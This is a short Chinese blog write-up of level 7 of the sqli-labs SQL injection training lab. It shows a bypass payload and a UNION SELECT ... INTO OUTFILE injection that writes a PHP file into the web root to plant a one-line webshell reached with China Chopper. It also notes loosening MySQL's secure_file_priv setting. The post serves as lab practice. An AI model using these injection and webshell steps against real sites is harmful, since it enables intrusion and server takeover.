sqli-labs第七关

 在第五六关卡了好几天，终于走到第七关了，首先查看源代码可以看到，SQL查询语句为SELECT *   FROM users WHERE id=(('3' )) -- ')) LIMIT 0,1

         于是构造绕过语句 192.168.18.136/sqli-labs-master/Less-7/?id=3' ))  --+

    接下来，我们发现 union 1,2,3一点用都没有

查看攻略得知，此题要用到 into outfile函数，大概意识就是用outfile构建一句话木马，然后用中国菜刀连接，拿到webshell,利用into outfile构建一句话，如图

但这里还有个很重要的点要说明，我用  http://IP/sqli-labs-master/Less-7/id=1')) union select 1,2,'' into outfile 'C:\\Users\\root\\Desktop\\phpstudy\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\a.php' -- +写了不知道多少次，一直没成功，后来发现是权限不够,于是 修改my.ini 在[mysqld]内加入secure_file_priv="/"。所以才会显示C:\.

  一般来说，刚开始这里是显示null，表示不支持导入导出，所以要将这里更改，如图我的改成了C:\,

已经构建成功

   

  然后用中国菜刀连接

  在这一讲里面一直有个东西不理解，就是每次都能成功写入，但每次页面都会回馈我一个语法错误的情况

  如果有大佬路过，烦请解释一下